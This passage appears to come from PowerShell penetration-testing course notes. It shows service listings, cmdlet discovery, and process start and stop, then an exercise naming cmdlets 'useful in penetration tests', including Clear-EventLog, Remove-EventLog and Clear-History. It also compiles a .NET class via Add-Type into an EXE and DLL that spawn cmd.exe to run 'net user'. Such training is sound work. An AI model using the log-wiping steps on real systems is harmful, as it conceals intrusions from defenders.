Modules\nStopped IPBusEnum PnP-X IP Bus Enumerator\nRunning iphlpsvc IP Helper\nRunning KeyIso CNG Key Isolation\nStopped KtmRm KtmRm for Distributed Transaction C...\nRunning LanmanServer Server\nRunning LanmanWorkstation Workstation\nStopped lltdsvc Link-Layer Topology Discovery Mapper\nRunning lmhosts TCP/IP NetBIOS Helper\nStopped Mcx2Svc Media Center Extender Service\nStopped MMCSS Multimedia Class Scheduler\nStopped MozillaMaintenance Mozilla Maintenance Service\nRunning MpsSvc Windows Firewall\nStopped MSDTC Distributed Transaction Coordinator\nStopped MSiSCSI Microsoft iSCSI Initiator Service\nStopped msiserver Windows Installer\nStopped napagent Network Access Protection Agent\nStopped Netlogon Netlogon\nRunning Netman Network Connections\nRunning netprofm Network List Service\nStopped NetTcpPortSharing Net.Tcp Port Sharing Service\nRunning NlaSvc Network Location Awareness\nRunning nsi Network Store Interface Service\nRunning p2pimsvc Peer Networking Identity Manager\nRunning p2psvc Peer Networking Grouping\nStopped PcaSvc Program Compatibility Assistant Ser...\nStopped PeerDistSvc BranchCache\nStopped pla Performance Logs & Alerts\nRunning PlugPlay Plug and Play\nStopped PNRPAutoReg PNRP Machine Name Publication Service\nRunning PNRPsvc Peer Name Resolution Protocol\nRunning PolicyAgent IPsec Policy Agent\nRunning Power Power\nRunning ProfSvc User Profile Service\nStopped ProtectedStorage Protected Storage\nStopped QWAVE Quality Windows Audio Video Experience\nStopped RasAuto Remote Access Auto Connection Manager\nStopped RasMan Remote Access Connection Manager\nStopped RemoteAccess Routing and Remote Access\nStopped RemoteRegistry Remote Registry\nRunning RpcEptMapper RPC Endpoint Mapper\nStopped RpcLocator Remote Procedure Call (RPC) Locator\nRunning RpcSs Remote Procedure Call (RPC)\nRunning SamSs Security Accounts Manager\nStopped SCardSvr Smart Card\nRunning Schedule Task Scheduler\nStopped SCPolicySvc Smart Card Removal Policy\nStopped SDRSVC Windows Backup\nStopped seclogon Secondary Logon\nRunning SENS System Event Notification Service\nStopped SensrSvc Adaptive Brightness\nStopped SessionEnv Remote Desktop Configuration\nStopped SharedAccess Internet Connection Sharing (ICS)\nRunning ShellHWDetection Shell Hardware Detection\nStopped SNMPTRAP SNMP Trap\nRunning Spooler Print Spooler\nStopped sppsvc Software Protection\nStopped sppuinotify SPP Notification Service\nRunning SSDPSRV SSDP Discovery\nStopped SstpSvc Secure Socket Tunneling Protocol Se...\nStopped StiSvc Windows Image Acquisition (WIA)\nStopped swprv Microsoft Software Shadow Copy Prov...\nRunning SysMain Superfetch\nStopped TabletInputService Tablet PC Input Service\nStopped TapiSrv Telephony\nStopped TBS TPM Base Services\nStopped TermService Remote Desktop Services\nRunning Themes Themes\nStopped THREADORDER Thread Ordering Server\nRunning TrkWks Distributed Link Tracking Client\nStopped TrustedInstaller Windows Modules Installer\nStopped UI0Detect Interactive Services Detection\nStopped UmRdpService Remote Desktop Services UserMode Po...\nRunning upnphost UPnP Device Host\nRunning UxSms Desktop Window Manager Session Manager\nStopped VaultSvc Credential Manager\nRunning VBoxService VirtualBox Guest Additions Service\nStopped vds Virtual Disk\nStopped VSS Volume Shadow Copy\nStopped W32Time Windows Time\nStopped wbengine Block Level Backup Engine Service\nStopped WbioSrvc Windows Biometric Service\nStopped wcncsvc Windows Connect Now - Config Registrar\nStopped WcsPlugInService Windows Color System\nRunning WdiServiceHost Diagnostic Service Host\nStopped WdiSystemHost Diagnostic System Host\nStopped WebClient WebClient\nStopped Wecsvc Windows Event Collector\nStopped wercplsupport Problem Reports and Solutions Contr...\nStopped WerSvc Windows Error Reporting Service\nRunning WinDefend Windows Defender\nStopped WinHttpAutoProx... WinHTTP Web Proxy Auto-Discovery Se...\nRunning Winmgmt Windows Management Instrumentation\nStopped WinRM Windows Remote Management (WS-Manag...\nStopped Wlansvc WLAN AutoConfig\nStopped wmiApSrv WMI Performance Adapter\nRunning WMPNetworkSvc Windows Media Player Network Sharin...\nStopped WPCSvc Parental Controls\nStopped WPDBusEnum Portable Device Enumerator Service\nRunning wscsvc Security Center\nRunning WSearch Windows Search\nRunning wuauserv Windows Update\nStopped wudfsvc Windows Driver Foundation - User-mo...\nStopped WwanSvc WWAN AutoConfig\n\n\nPS C:\\Users\\Windows-32>\n```\n\n- List all ```Cmdlet``` of ```Get-Command``` with name ```start```\n\n```Powershell\nPS C:\\Users\\Windows-32> Get-Command -Verb start\n\nCommandType Name\n----------- ----\nCmdlet Start-Job\nCmdlet Start-Process\nCmdlet Start-Service\nCmdlet Start-Sleep\nCmdlet Start-Transaction\nCmdlet Start-Transcript\n\n\nPS C:\\Users\\Windows-32>\n```\n\n- List all ```Cmdlet``` of ```Get-Command``` with name ```stop```\n\n```Powershell\nPS C:\\Users\\Windows-32> Get-Command -Verb stop\n\nCommandType Name\n----------- ----\nCmdlet Stop-Computer\nCmdlet Stop-Job\nCmdlet Stop-Process\nCmdlet Stop-Service\nCmdlet Stop-Transcript\n\n\nPS C:\\Users\\Windows-32>\n```\n\n- Examples of ```Start-Process```\n\n```Powershell\nPS C:\\Users\\Windows-32> Get-Help Start-Process -Examples\n\nNAME\n Start-Process\n\nSYNOPSIS\n Starts one or more processes on the local computer.\n\n -------------------------- EXAMPLE 1 --------------------------\n\n C:\\PS>start-process sort.exe\n\n\n Description\n -----------\n This command starts a process that uses the Sort.exe file in the current directory. The command uses all of the default values, including the default window style, working directory, and credentials.\n\n\n\n\n -------------------------- EXAMPLE 2 --------------------------\n\n C:\\PS>start-process myfile.txt -workingdirectory \"C:\\PS-Test\" -verb Print\n\n\n Description\n -----------\n This command starts a process that prints the C:\\PS-Test\\MyFile.txt file.\n\n\n\n\n -------------------------- EXAMPLE 3 --------------------------\n\n C:\\PS>start-process Sort.exe -RedirectStandardInput Testsort.txt -RedirectStandardOutput Sorted.txt -RedirectStandardError SortError.txt -UseNewEnvironment\n\n\n Description\n -----------\n This command starts a process that sorts items in the Testsort.txt file and returns the sorted items in the Sorted.txt files. Any errors are written to the SortError.txt file.\n\n The UseNewEnvironment parameter specifies that the process runs with its own environment variables.\n\n\n\n\n -------------------------- EXAMPLE 4 --------------------------\n\n C:\\PS>start-process notepad -wait -windowstyle Maximized\n\n\n Description\n -----------\n This command starts the Notepad process. It maximizes the window and retains the window until the process completes.\n\nPS C:\\Users\\Windows-32>\n```\n\n- ```Start-Process```\n\n```Powershell\nPS C:\\Users\\Windows-32> Start-Process notepad.exe\n```\n\n- ```Stop-Process```\n\n```Powershell\nPS C:\\Users\\Windows-32> Stop-Process -Name notepad\n```\n\n- ```Start-Process``` and ```Stop-Process```\n\n```Powershell\nPS C:\\Users\\Windows-32> Get-Process -Name notepad\n\nHandles NPM(K) PM(K) WS(K) VM(M) CPU(s) Id ProcessName\n------- ------ ----- ----- ----- ------ -- -----------\n 56 3 912 4256 55 0.15 1592 notepad\n 56 3 912 4136 55 0.04 2360 notepad\n 56 3 916 4208 55 0.07 2960 notepad\n 56 3 916 4208 55 0.07 3288 notepad\n\n\nPS C:\\Users\\Windows-32>\n```\n\n```Powershell\nPS C:\\Users\\Windows-32> Stop-Process -Id 1592\n```\n\n```Powershell\nPS C:\\Users\\Windows-32> Get-Process -Name notepad\n\nHandles NPM(K) PM(K) WS(K) VM(M) CPU(s) Id ProcessName\n------- ------ ----- ----- ----- ------ -- -----------\n 56 3 912 4136 55 0.04 2360 notepad\n 56 3 916 4208 55 0.07 2960 notepad\n 56 3 916 4208 55 0.07 3288 notepad\n\n\nPS C:\\Users\\Windows-32>\n```\n\n- List all ```Hotfixes```\n\n```Powershell\nPS C:\\Users\\Windows-32> Get-HotFix\n```\n\n- ```Get-Help``` for ```command```\n\n```Powershell\nPS C:\\Users\\Windows-32> Get-Help *command*\n\nName Category Synopsis\n---- -------- --------\nGet-Command Cmdlet Gets basic information about cmdlets and other elements of Windows PowerShell commands.\nInvoke-Command Cmdlet Runs commands on local and remote computers.\nMeasure-Command Cmdlet Measures the time it takes to run script blocks and cmdlets.\nTrace-Command Cmdlet Configures and starts a trace of the specified expression or command.\nabout_command_precedence HelpFile Describes how Windows PowerShell determines which command to run.\nabout_Command_Syntax HelpFile Describes the notation used for Windows PowerShell syntax in Help.\nabout_Core_Commands HelpFile Lists the cmdlets that are designed for use with Windows PowerShell\n\n\nPS C:\\Users\\Windows-32>\n```\n\n- ```Get-Help``` for ```about_Core_Commands```\n\n```Powershell\nPS C:\\Users\\Windows-32> Get-Help about_Core_Commands\nTOPIC\n about_Core_Commands\n\nSHORT DESCRIPTION\n Lists the cmdlets that are designed for use with Windows PowerShell\n providers.\n\n\nLONG DESCRIPTION\n Windows PowerShell includes a set of cmdlets that are specifically\n designed to manage the items in the data stores that are exposed by Windows\n PowerShell providers. You can use these cmdlets in the same ways to manage\n all the different types of data that the providers make available to you.\n For more information about providers, type \"get-help about_providers\".\n\n\n For example, you can use the Get-ChildItem cmdlet to list the files in a\n file system directory, the keys under a registry key, or the items that are\n exposed by a provider that you write or download.\n\n\n The following is a list of the Windows PowerShell cmdlets that are designed\n for use with providers:\n\n\n ChildItem cmdlets\n Get-ChildItem\n\n\n Content cmdlets\n Add-Content\n Clear-Content\n Get-Content\n Set-Content\n\n\n Item cmdlets\n Clear-Item\n Copy-Item\n Get-Item\n Invoke-Item\n Move-Item\n New-Item\n Remove-Item\n Rename-Item\n Set-Item\n\n\n ItemProperty cmdlets\n Clear-ItemProperty\n Copy-ItemProperty\n Get-ItemProperty\n Move-ItemProperty\n New-ItemProperty\n Remove-ItemProperty\n Rename-ItemProperty\n Set-ItemProperty\n\n\n Location cmdlets\n Get-Location\n Pop-Location\n Push-Location\n Set-Location\n\n\n Path cmdlets\n Join-Path\n Convert-Path\n Split-Path\n Resolve-Path\n Test-Path\n\n\n PSDrive cmdlets\n Get-PSDrive\n New-PSDrive\n Remove-PSDrive\n\n\n PSProvider cmdlets\n Get-PSProvider\n\n\n For more information about a cmdlet, type \"get-help \".\n\nSEE ALSO\n about_Providers\nPS C:\\Users\\Windows-32>\n```\n\n###### Exercise\n\nExplore ```cmdlets``` using ```Get-Command``` and pick ten ```cmdlets``` which could be useful in ```penetration tests```.\n\n- List of all ```cmdlet```\n\n```Powershell\nPS C:\\Users\\Windows-32> Get-Command -type cmdlet\n\nCommandType Name\n----------- ----\nCmdlet Add-Computer\nCmdlet Add-Content\nCmdlet Add-History\nCmdlet Add-Member\nCmdlet Add-PSSnapin\nCmdlet Add-Type\nCmdlet Checkpoint-Computer\nCmdlet Clear-Content\nCmdlet Clear-EventLog\nCmdlet Clear-History\nCmdlet Clear-Item\nCmdlet Clear-ItemProperty\nCmdlet Clear-Variable\nCmdlet Compare-Object\nCmdlet Complete-Transaction\nCmdlet Connect-WSMan\nCmdlet ConvertFrom-Csv\nCmdlet ConvertFrom-SecureString\nCmdlet ConvertFrom-StringData\nCmdlet Convert-Path\nCmdlet ConvertTo-Csv\nCmdlet ConvertTo-Html\nCmdlet ConvertTo-SecureString\nCmdlet ConvertTo-Xml\nCmdlet Copy-Item\nCmdlet Copy-ItemProperty\nCmdlet Debug-Process\nCmdlet Disable-ComputerRestore\nCmdlet Disable-PSBreakpoint\nCmdlet Disable-PSSessionConfiguration\nCmdlet Disable-WSManCredSSP\nCmdlet Disconnect-WSMan\nCmdlet Enable-ComputerRestore\nCmdlet Enable-PSBreakpoint\nCmdlet Enable-PSRemoting\nCmdlet Enable-PSSessionConfiguration\nCmdlet Enable-WSManCredSSP\nCmdlet Enter-PSSession\nCmdlet Exit-PSSession\nCmdlet Export-Alias\nCmdlet Export-Clixml\nCmdlet Export-Console\nCmdlet Export-Counter\nCmdlet Export-Csv\nCmdlet Export-FormatData\nCmdlet Export-ModuleMember\nCmdlet Export-PSSession\nCmdlet ForEach-Object\nCmdlet Format-Custom\nCmdlet Format-List\nCmdlet Format-Table\nCmdlet Format-Wide\nCmdlet Get-Acl\nCmdlet Get-Alias\nCmdlet Get-AuthenticodeSignature\nCmdlet Get-ChildItem\nCmdlet Get-Command\nCmdlet Get-ComputerRestorePoint\nCmdlet Get-Content\nCmdlet Get-Counter\nCmdlet Get-Credential\nCmdlet Get-Culture\nCmdlet Get-Date\nCmdlet Get-Event\nCmdlet Get-EventLog\nCmdlet Get-EventSubscriber\nCmdlet Get-ExecutionPolicy\nCmdlet Get-FormatData\nCmdlet Get-Help\nCmdlet Get-History\nCmdlet Get-Host\nCmdlet Get-HotFix\nCmdlet Get-Item\nCmdlet Get-ItemProperty\nCmdlet Get-Job\nCmdlet Get-Location\nCmdlet Get-Member\nCmdlet Get-Module\nCmdlet Get-PfxCertificate\nCmdlet Get-Process\nCmdlet Get-PSBreakpoint\nCmdlet Get-PSCallStack\nCmdlet Get-PSDrive\nCmdlet Get-PSProvider\nCmdlet Get-PSSession\nCmdlet Get-PSSessionConfiguration\nCmdlet Get-PSSnapin\nCmdlet Get-Random\nCmdlet Get-Service\nCmdlet Get-TraceSource\nCmdlet Get-Transaction\nCmdlet Get-UICulture\nCmdlet Get-Unique\nCmdlet Get-Variable\nCmdlet Get-WinEvent\nCmdlet Get-WmiObject\nCmdlet Get-WSManCredSSP\nCmdlet Get-WSManInstance\nCmdlet Group-Object\nCmdlet Import-Alias\nCmdlet Import-Clixml\nCmdlet Import-Counter\nCmdlet Import-Csv\nCmdlet Import-LocalizedData\nCmdlet Import-Module\nCmdlet Import-PSSession\nCmdlet Invoke-Command\nCmdlet Invoke-Expression\nCmdlet Invoke-History\nCmdlet Invoke-Item\nCmdlet Invoke-WmiMethod\nCmdlet Invoke-WSManAction\nCmdlet Join-Path\nCmdlet Limit-EventLog\nCmdlet Measure-Command\nCmdlet Measure-Object\nCmdlet Move-Item\nCmdlet Move-ItemProperty\nCmdlet New-Alias\nCmdlet New-Event\nCmdlet New-EventLog\nCmdlet New-Item\nCmdlet New-ItemProperty\nCmdlet New-Module\nCmdlet New-ModuleManifest\nCmdlet New-Object\nCmdlet New-PSDrive\nCmdlet New-PSSession\nCmdlet New-PSSessionOption\nCmdlet New-Service\nCmdlet New-TimeSpan\nCmdlet New-Variable\nCmdlet New-WebServiceProxy\nCmdlet New-WSManInstance\nCmdlet New-WSManSessionOption\nCmdlet Out-Default\nCmdlet Out-File\nCmdlet Out-GridView\nCmdlet Out-Host\nCmdlet Out-Null\nCmdlet Out-Printer\nCmdlet Out-String\nCmdlet Pop-Location\nCmdlet Push-Location\nCmdlet Read-Host\nCmdlet Receive-Job\nCmdlet Register-EngineEvent\nCmdlet Register-ObjectEvent\nCmdlet Register-PSSessionConfiguration\nCmdlet Register-WmiEvent\nCmdlet Remove-Computer\nCmdlet Remove-Event\nCmdlet Remove-EventLog\nCmdlet Remove-Item\nCmdlet Remove-ItemProperty\nCmdlet Remove-Job\nCmdlet Remove-Module\nCmdlet Remove-PSBreakpoint\nCmdlet Remove-PSDrive\nCmdlet Remove-PSSession\nCmdlet Remove-PSSnapin\nCmdlet Remove-Variable\nCmdlet Remove-WmiObject\nCmdlet Remove-WSManInstance\nCmdlet Rename-Item\nCmdlet Rename-ItemProperty\nCmdlet Reset-ComputerMachinePassword\nCmdlet Resolve-Path\nCmdlet Restart-Computer\nCmdlet Restart-Service\nCmdlet Restore-Computer\nCmdlet Resume-Service\nCmdlet Select-Object\nCmdlet Select-String\nCmdlet Select-Xml\nCmdlet Send-MailMessage\nCmdlet Set-Acl\nCmdlet Set-Alias\nCmdlet Set-AuthenticodeSignature\nCmdlet Set-Content\nCmdlet Set-Date\nCmdlet Set-ExecutionPolicy\nCmdlet Set-Item\nCmdlet Set-ItemProperty\nCmdlet Set-Location\nCmdlet Set-PSBreakpoint\nCmdlet Set-PSDebug\nCmdlet Set-PSSessionConfiguration\nCmdlet Set-Service\nCmdlet Set-StrictMode\nCmdlet Set-TraceSource\nCmdlet Set-Variable\nCmdlet Set-WmiInstance\nCmdlet Set-WSManInstance\nCmdlet Set-WSManQuickConfig\nCmdlet Show-EventLog\nCmdlet Sort-Object\nCmdlet Split-Path\nCmdlet Start-Job\nCmdlet Start-Process\nCmdlet Start-Service\nCmdlet Start-Sleep\nCmdlet Start-Transaction\nCmdlet Start-Transcript\nCmdlet Stop-Computer\nCmdlet Stop-Job\nCmdlet Stop-Process\nCmdlet Stop-Service\nCmdlet Stop-Transcript\nCmdlet Suspend-Service\nCmdlet Tee-Object\nCmdlet Test-ComputerSecureChannel\nCmdlet Test-Connection\nCmdlet Test-ModuleManifest\nCmdlet Test-Path\nCmdlet Test-WSMan\nCmdlet Trace-Command\nCmdlet Undo-Transaction\nCmdlet Unregister-Event\nCmdlet Unregister-PSSessionConfiguration\nCmdlet Update-FormatData\nCmdlet Update-List\nCmdlet Update-TypeData\nCmdlet Use-Transaction\nCmdlet Wait-Event\nCmdlet Wait-Job\nCmdlet Wait-Process\nCmdlet Where-Object\nCmdlet Write-Debug\nCmdlet Write-Error\nCmdlet Write-EventLog\nCmdlet Write-Host\nCmdlet Write-Output\nCmdlet Write-Progress\nCmdlet Write-Verbose\nCmdlet Write-Warning\n\n\nPS C:\\Users\\Windows-32>\n```\n\n- List of all ```cmdlet``` useful in Penetration tests\n\n - Add-Computer\n - Clear-EventLog\n - Clear-History\n - Disable-ComputerRestore\n - Get-Acl\n - Remove-EventLog\n - Set-Date\n - Start-Process\n - Start-Service\n - Stop-Process\n - Stop-Service\n - Write-Output\n" }, { "path": "30-Using-NET-in-Powershell-Part-4.md", "content": "#### 30. Using .NET in Powershell Part 4\r\n\r\n###### Add-Type\r\n\r\n- Use ```Add-Type``` with ```-FromPath``` \r\n\r\n```Invoke-SysCommandsDLL.ps1```\r\n\r\n```PowerShell\r\n$DotnetCode = @\"\r\npublic class SysCommands\r\n{\r\n public static void lookup (string domainname)\r\n {\r\n System.Diagnostics.Process.Start(\"nslookup.exe\",domainname);\r\n }\r\n\r\n public void netcmd (string cmd)\r\n {\r\n string cmdstring = \"/k net.exe \" + cmd;\r\n System.Diagnostics.Process.Start(\"cmd.exe\",cmdstring);\r\n\r\n }\r\n\r\n public static void Main()\r\n {\r\n string cmdstring = \"/k net.exe \" + \"user\";\r\n System.Diagnostics.Process.Start(\"cmd.exe\",cmdstring);\r\n }\r\n}\r\n\r\n\"@\r\n\r\n#Add-Type -TypeDefinition $DotnetCode -OutputType Library -OutputAssembly C:\\Users\\Administrator\\Desktop\\SysCommands.dll\r\nAdd-Type -TypeDefinition $DotnetCode -OutputType ConsoleApplication -OutputAssembly C:\\Users\\Administrator\\Desktop\\SysCommand.exe\r\n\r\n<##[SysCommands]::lookup(\"google.com\")\r\n\r\n$obj = New-Object SysCommands\r\n$obj.netcmd(\"user\")#>\r\n```\r\n\r\n```PowerShell\r\n$DotnetCode = @\"\r\npublic class SysCommands\r\n{\r\n public static void lookup (string domainname)\r\n {\r\n System.Diagnostics.Process.Start(\"nslookup.exe\",domainname);\r\n }\r\n\r\n public void netcmd (string cmd)\r\n {\r\n string cmdstring = \"/k net.exe \" + cmd;\r\n System.Diagnostics.Process.Start(\"cmd.exe\",cmdstring);\r\n\r\n }\r\n\r\n public static void Main()\r\n {\r\n string cmdstring = \"/k net.exe \" + \"user\";\r\n System.Diagnostics.Process.Start(\"cmd.exe\",cmdstring);\r\n }\r\n}\r\n\r\n\"@\r\n\r\nAdd-Type -TypeDefinition $DotnetCode -OutputType Library -OutputAssembly C:\\Users\\Administrator\\Desktop\\SysCommands.dll\r\n#Add-Type -TypeDefinition $DotnetCode -OutputType ConsoleApplication -OutputAssembly C:\\Users\\Administrator\\Desktop\\SysCommand.exe\r\n\r\n<##[SysCommands]::lookup(\"google.com\")\r\n\r\n$obj = New-Object SysCommands\r\n$obj.netcmd(\"user\")#>\r\n```\r\n\r\n- Compiling ```DLLs``` / ```ConsoleApps```\r\n\r\n```PowerShell\r\nPS C:\\Users\\Administrator\\Desktop\\Code\\30> .\\Invoke-SysCommandsDLL.ps1\r\n```\r\n\r\n```PowerShell\r\nPS C:\\Users\\Administrator\\Desktop> ls SysComm*\r\n\r\n\r\n Directory: C:\\Users\\Administrator\\Desktop\r\n\r\n\r\nMode LastWriteTime Length Name\r\n---- ------------- ------ ----\r\n-a--- 7/12/2017 3:28 PM 4096 SysCommand.exe\r\n-a--- 7/12/2017 3:27 PM 3584 SysCommands.dll\r\n\r\n\r\nPS C:\\Users\\Administrator\\Desktop>\r\n```\r\n\r\n- Using ```EXE```\r\n\r\n![Image of EXE](images/6.jpeg)\r\n\r\n- Using ```DLLs```\r\n\r\n```PowerShell\r\nPS C:\\Users\\Administrator\\Desktop> $obj = Add-Type -Path .\\SysCommands.dll -PassThru\r\n```\r\n\r\n```PowerShell\r\nPS C:\\Users\\Administrator\\Desktop> [SysCommands]::lookup(\"google.com\")\r\n```\r\n\r\n```PowerShell\r\nPS C:\\Users\\Administrator\\Desktop> $obj | Get-Member\r\n\r\n TypeName: System.RuntimeType\r\n\r\nName MemberType Definition\r\n---- ---------- ----------\r\nAsType Method type AsType()\r\nClone Method System.Object Clone(), System.Object ICloneable.Clone()\r\nEquals Method bool Equals(System.Object obj), bool Equals(type o), bool _MemberInfo.Equals(System.Object other), bool _Type.Equals(System.Object other), bool _Type.Equals(...\r\nFindInterfaces Method type[] FindInterfaces(System.Reflection.TypeFilter filter, System.Object filterCriteria), type[] _Type.FindInterfaces(System.Reflection.TypeFilter filter, Sy...\r\nFindMembers Method System.Reflection.MemberInfo[] FindMembers(System.Reflection.MemberTypes memberType, System.Reflection.BindingFlags bindingAttr, System.Reflection.MemberFilt...\r\nGetArrayRank Method int GetArrayRank(), int _Type.GetArrayRank()\r\nGetConstructor Method System.Reflection.ConstructorInfo GetConstructor(System.Reflection.BindingFlags bindingAttr, System.Reflection.Binder binder, System.Reflection.CallingConven...\r\nGetConstructors Method System.Reflection.ConstructorInfo[] GetConstructors(System.Reflection.BindingFlags bindingAttr), System.Reflection.ConstructorInfo[] GetConstructors(), Syste...\r\nGetCustomAttributes Method System.Object[] GetCustomAttributes(bool inherit), System.Object[] GetCustomAttributes(type attributeType, bool inherit), System.Object[] ICustomAttributePro...\r\nGetCustomAttributesData Method System.Collections.Generic.IList[System.Reflection.CustomAttributeData] GetCustomAttributesData()\r\nGetDeclaredEvent Method System.Reflection.EventInfo GetDeclaredEvent(string name)\r\nGetDeclaredField Method System.Reflection.FieldInfo GetDeclaredField(string name)\r\nGetDeclaredMethod Method System.Reflection.MethodInfo GetDeclaredMethod(string name)\r\nGetDeclaredMethods Method System.Collections.Generic.IEnumerable[System.Reflection.MethodInfo] GetDeclaredMethods(string name)\r\nGetDeclaredNestedType Method System.Reflection.TypeInfo GetDeclaredNestedType(string name)\r\nGetDeclaredProperty Method System.Reflection.PropertyInfo GetDeclaredProperty(string name)\r\nGetDefaultMembers Method System.Reflection.MemberInfo[] GetDefaultMembers(), System.Reflection.MemberInfo[] _Type.GetDefaultMembers()\r\nGetElementType Method type GetElementType(), type _Type.GetElementType()\r\nGetEnumName Method string GetEnumName(System.Object value)\r\nGetEnumNames Method string[] GetEnumNames()\r\nGetEnumUnderlyingType Method type GetEnumUnderlyingType()\r\nGetEnumValues Method array GetEnumValues()\r\nGetEvent Method System.Reflection.EventInfo GetEvent(string name, System.Reflection.BindingFlags bindingAttr), System.Reflection.EventInfo GetEvent(string name), System.Refl...\r\nGetEvents Method System.Reflection.EventInfo[] GetEvents(System.Reflection.BindingFlags bindingAttr), System.Reflection.EventInfo[] GetEvents(), System.Reflection.EventInfo[]...\r\nGetField Method System.Reflection.FieldInfo GetField(string name, System.Reflection.BindingFlags bindingAttr), System.Reflection.FieldInfo GetField(string name), System.Refl...\r\nGetFields Method System.Reflection.FieldInfo[] GetFields(System.Reflection.BindingFlags bindingAttr), System.Reflection.FieldInfo[] GetFields(), System.Reflection.FieldInfo[]...\r\nGetGenericArguments Method type[] GetGenericArguments()\r\nGetGenericParameterConstraints Method type[] GetGenericParameterConstraints()\r\nGetGenericTypeDefinition Method type GetGenericTypeDefinition()\r\nGetHashCode Method int GetHashCode(), int _MemberInfo.GetHashCode(), int _Type.GetHashCode()\r\nGetIDsOfNames Method void _MemberInfo.GetIDsOfNames([ref] guid riid, System.IntPtr rgszNames, uint32 cNames, uint32 lcid, System.IntPtr rgDispId), void _Type.GetIDsOfNames([ref] ...\r\nGetInterface Method type GetInterface(string fullname, bool ignoreCase), type GetInterface(string name), type _Type.GetInterface(string name, bool ignoreCase), type _Type.GetInt...\r\nGetInterfaceMap Method System.Reflection.InterfaceMapping GetInterfaceMap(type ifaceType), System.Reflection.InterfaceMapping _Type.GetInterfaceMap(type interfaceType)\r\nGetInterfaces Method type[] GetInterfaces(), type[] _Type.GetInterfaces()\r\nGetMember Method System.Reflection.MemberInfo[] GetMember(string name, System.Reflection.MemberTypes type, System.Reflection.BindingFlags bindingAttr), System.Reflection.Memb...\r\nGetMembers Method System.Reflection.MemberInfo[] GetMembers(System.Reflection.BindingFlags bindingAttr), System.Reflection.MemberInfo[] GetMembers(), System.Reflection.MemberI...\r\nGetMethod Method System.Reflection.MethodInfo GetMethod(string name, System.Reflection.BindingFlags bindingAttr, System.Reflection.Binder binder, System.Reflection.CallingCon...\r\nGetMethods Method System.Reflection.MethodInfo[] GetMethods(System.Reflection.BindingFlags bindingAttr), System.Reflection.MethodInfo[] GetMethods(), System.Reflection.MethodI...\r\nGetNestedType Method type GetNestedType(string fullname, System.Reflection.BindingFlags bindingAttr), type GetNestedType(string name), type _Type.GetNestedType(string name, Syste...\r\nGetNestedTypes Method type[] GetNestedTypes(System.Reflection.BindingFlags bindingAttr), type[] GetNestedTypes(), type[] _Type.GetNestedTypes(System.Reflection.BindingFlags bindin...\r\nGetObjectData Method void GetObjectData(System.Runtime.Serialization.SerializationInfo info, System.Runtime.Serialization.StreamingContext context), void ISerializable.GetObjectD...\r\nGetProperties Method System.Reflection.PropertyInfo[] GetProperties(System.Reflection.BindingFlags bindingAttr), System.Reflection.PropertyInfo[] GetProperties(), System.Reflecti...\r\nGetProperty Method System.Reflection.PropertyInfo GetProperty(string name, System.Reflection.BindingFlags bindingAttr, System.Reflection.Binder binder, type returnType, type[] ...\r\nGetType Method type GetType(), type _MemberInfo.GetType(), type _Type.GetType()\r\nGetTypeInfo Method void _MemberInfo.GetTypeInfo(uint32 iTInfo, uint32 lcid, System.IntPtr ppTInfo), void _Type.GetTypeInfo(uint32 iTInfo, uint32 lcid, System.IntPtr ppTInfo), S...\r\nGetTypeInfoCount Method void _MemberInfo.GetTypeInfoCount([ref] uint32 pcTInfo), void _Type.GetTypeInfoCount([ref] uint32 pcTInfo)\r\nInvoke Method void _MemberInfo.Invoke(uint32 dispIdMember, [ref] guid riid, uint32 lcid, int16 wFlags, System.IntPtr pDispParams, System.IntPtr pVarResult, System.IntPtr p...\r\nInvokeMember Method System.Object InvokeMember(string name, System.Reflection.BindingFlags bindingFlags, System.Reflection.Binder binder, System.Object target, System.Object[] p...\r\nIsAssignableFrom Method bool IsAssignableFrom(System.Reflection.TypeInfo typeInfo), bool IsAssignableFrom(type c), bool _Type.IsAssignableFrom(type c)\r\nIsDefined Method bool IsDefined(type attributeType, bool inherit), bool ICustomAttributeProvider.IsDefined(type attributeType, bool inherit), bool _MemberInfo.IsDefined(type ...\r\nIsEnumDefined Method bool IsEnumDefined(System.Object value)\r\nIsEquivalentTo Method bool IsEquivalentTo(type other)\r\nIsInstanceOfType Method bool IsInstanceOfType(System.Object o), bool _Type.IsInstanceOfType(System.Object o)\r\nIsSubclassOf Method bool IsSubclassOf(type type), bool _Type.IsSubclassOf(type c)\r\nMakeArrayType Method type MakeArrayType(), type MakeArrayType(int rank)\r\nMakeByRefType Method type MakeByRefType()\r\nMakeGenericType Method type MakeGenericType(Params type[] instantiation)\r\nMakePointerType Method type MakePointerType()\r\nToString Method string ToString(), string _MemberInfo.ToString(), string _Type.ToString()\r\nAssembly Property System.Reflection.Assembly Assembly {get;}\r\nAssemblyQualifiedName Property string AssemblyQualifiedName {get;}\r\nAttributes Property System.Reflection.TypeAttributes Attributes {get;}\r\nBaseType Property type BaseType {get;}\r\nContainsGenericParameters Property bool ContainsGenericParameters {get;}\r\nCustomAttributes Property System.Collections.Generic.IEnumerable[System.Reflection.CustomAttributeData] CustomAttributes {get;}\r\nDeclaredConstructors Property System.Collections.Generic.IEnumerable[System.Reflection.ConstructorInfo] DeclaredConstructors {get;}\r\nDeclaredEvents Property System.Collections.Generic.IEnumerable[System.Reflection.EventInfo] DeclaredEvents {get;}\r\nDeclaredFields Property System.Collections.Generic.IEnumerable[System.Reflection.FieldInfo] DeclaredFields {get;}\r\nDeclaredMembers Property System.Collections.Generic.IEnumerable[System.Reflection.MemberInfo] DeclaredMembers {get;}\r\nDeclaredMethods Property System.Collections.Generic.IEnumerable[System.Reflection.MethodInfo] DeclaredMethods {get;}\r\nDeclaredNestedTypes Property System.Collections.Generic.IEnumerable[System.Reflection.TypeInfo] DeclaredNestedTypes {get;}\r\nDeclaredProperties Property System.Collections.Generic.IEnumerable[System.Reflection.PropertyInfo] DeclaredProperties {get;}\r\nDeclaringMethod Property System.Reflection.MethodBase DeclaringMethod {get;}\r\nDeclaringType Property type DeclaringType {get;}\r\nFullName Property string FullName {get;}\r\nGenericParameterAttributes Property System.Reflection.GenericParameterAttributes GenericParameterAttributes {get;}\r\nGenericParameterPosition Property int GenericParameterPosition {get;}\r\nGenericTypeArguments Property type[] GenericTypeArguments {get;}\r\nGenericTypeParameters Property type[] GenericTypeParameters {get;}\r\nGUID Property guid GUID {get;}\r\nHasElementType Property bool HasElementType {get;}\r\nImplementedInterfaces Property System.Collections.Generic.IEnumerable[type] ImplementedInterfaces {get;}\r\nIsAbstract Property bool IsAbstract {get;}\r\nIsAnsiClass Property bool IsAnsiClass {get;}\r\nIsArray Property bool IsArray 